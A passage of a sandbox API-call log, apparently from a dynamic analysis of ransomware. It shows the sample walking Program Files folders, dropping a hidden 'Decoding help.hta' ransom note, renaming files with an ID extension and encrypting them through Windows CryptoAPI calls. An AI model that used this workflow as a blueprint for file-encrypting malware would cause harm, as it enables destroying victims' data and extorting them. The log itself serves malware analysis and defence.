nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0039.233] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.233] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsprofilerui.dll") returned -1 [0039.233] lstrlenW (lpString="jsprofilerui.dll") returned 16 [0039.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="jsprofilerui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll" [0039.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll" [0039.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilerui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilerui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.233] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4239426f, ftCreationTime.dwHighDateTime=0x1ca0405, ftLastAccessTime.dwLowDateTime=0x4239426f, ftLastAccessTime.dwHighDateTime=0x1ca0405, ftLastWriteTime.dwLowDateTime=0x67fe631c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x40df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0039.233] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.233] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdbg2.dll") returned -1 [0039.233] lstrlenW (lpString="msdbg2.dll") returned 10 [0039.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="msdbg2.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll" [0039.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll" [0039.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files (x86)\\internet explorer\\msdbg2.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\msdbg2.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.234] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b0ea3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x68b0ea3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x68b34b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x56df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0039.234] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.234] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.234] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pdm.dll") returned -1 [0039.234] lstrlenW (lpString="pdm.dll") returned 7 [0039.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.234] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="pdm.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll" [0039.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll" [0039.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files (x86)\\internet explorer\\pdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\pdm.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.234] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0039.234] lstrcmpW (lpString1=".", lpString2="SIGNUP") returned -1 [0039.234] lstrcmpW (lpString1="..", lpString2="SIGNUP") returned -1 [0039.234] lstrcmpiW (lpString1="windows", lpString2="SIGNUP") returned 1 [0039.236] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.236] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.236] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="SIGNUP" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" [0039.236] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*" [0039.236] GlobalMemoryStatus (in: lpBuffer=0x51cfd10 | out: lpBuffer=0x51cfd10) [0039.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9641e20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.246] CloseHandle (hObject=0x1ac) returned 1 [0039.246] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0039.246] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.246] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.246] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqmapi.dll") returned -1 [0039.246] lstrlenW (lpString="sqmapi.dll") returned 10 [0039.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.246] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" [0039.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" [0039.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.271] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0039.271] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 44 os_tid = 0xae4 [0039.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*", lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x10a3ae10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10a3ae10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.187] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.187] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x10a3ae10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10a3ae10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.188] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.188] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.188] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a884be0, ftCreationTime.dwHighDateTime=0x1d4ad65, ftLastAccessTime.dwLowDateTime=0x45c55b30, ftLastAccessTime.dwHighDateTime=0x1d4b614, ftLastWriteTime.dwLowDateTime=0x45c55b30, ftLastWriteTime.dwHighDateTime=0x1d4b614, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bannedhard.exe", cAlternateFileName="BANNED~1.EXE")) returned 1 [0039.188] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.188] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Decoding help.hta" [0039.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\decoding help.hta")) returned 0xffffffff [0039.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.188] WriteFile (in: hFile=0x198, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x530fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x530fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.189] CloseHandle (hObject=0x198) returned 1 [0039.189] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.189] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bannedhard.exe") returned 1 [0039.189] lstrlenW (lpString="bannedhard.exe") returned 14 [0039.189] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.190] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="bannedhard.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe" [0039.190] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe" [0039.190] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe" (normalized: "c:\\program files\\microsoft office\\bannedhard.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\bannedhard.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\bannedhard.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.190] CreateFileMappingA (hFile=0x198, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a8 [0039.190] CryptAcquireContextA (in: phProv=0x530fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x530fcec*=0x5b0220) returned 1 [0039.191] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x530fce8 | out: phKey=0x530fce8*=0x5a5370) returned 1 [0039.191] CryptExportKey (in: hKey=0x5a5370, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x530fbe4, pdwDataLen=0x530fce4 | out: pbData=0x530fbe4*, pdwDataLen=0x530fce4*=0x2c) returned 1 [0039.191] MapViewOfFile (hFileMappingObject=0x1a8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.193] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x530fbe4*, pdwDataLen=0x530fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x530fbe4*, pdwDataLen=0x530fcf8*=0x100) returned 1 [0039.194] CryptEncrypt (in: hKey=0x5a5370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x530fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x530fce4*=0x12800) returned 1 [0039.195] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.196] CloseHandle (hObject=0x1a8) returned 1 [0039.197] CryptDestroyKey (hKey=0x5a5370) returned 1 [0039.197] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.197] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.197] WriteFile (in: hFile=0x198, lpBuffer=0x530fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x530fcf8, lpOverlapped=0x0 | out: lpBuffer=0x530fbe4*, lpNumberOfBytesWritten=0x530fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.197] WriteFile (in: hFile=0x198, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x530fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x530fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.197] CloseHandle (hObject=0x198) returned 1 [0039.199] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\bannedhard.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.199] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0039.199] lstrcmpW (lpString1=".", lpString2="CLIPART") returned -1 [0039.199] lstrcmpW (lpString1="..", lpString2="CLIPART") returned -1 [0039.199] lstrcmpiW (lpString1="windows", lpString2="CLIPART") returned 1 [0039.199] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="CLIPART" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART" [0039.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*" [0039.200] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0039.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41a83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.208] CloseHandle (hObject=0x198) returned 1 [0039.208] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Themes 14", cAlternateFileName="DOCUME~1")) returned 1 [0039.208] lstrcmpW (lpString1=".", lpString2="Document Themes 14") returned -1 [0039.208] lstrcmpW (lpString1="..", lpString2="Document Themes 14") returned -1 [0039.208] lstrcmpiW (lpString1="windows", lpString2="Document Themes 14") returned 1 [0039.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="Document Themes 14" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14" [0039.209] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14", lpString2="\\*.*" | out: 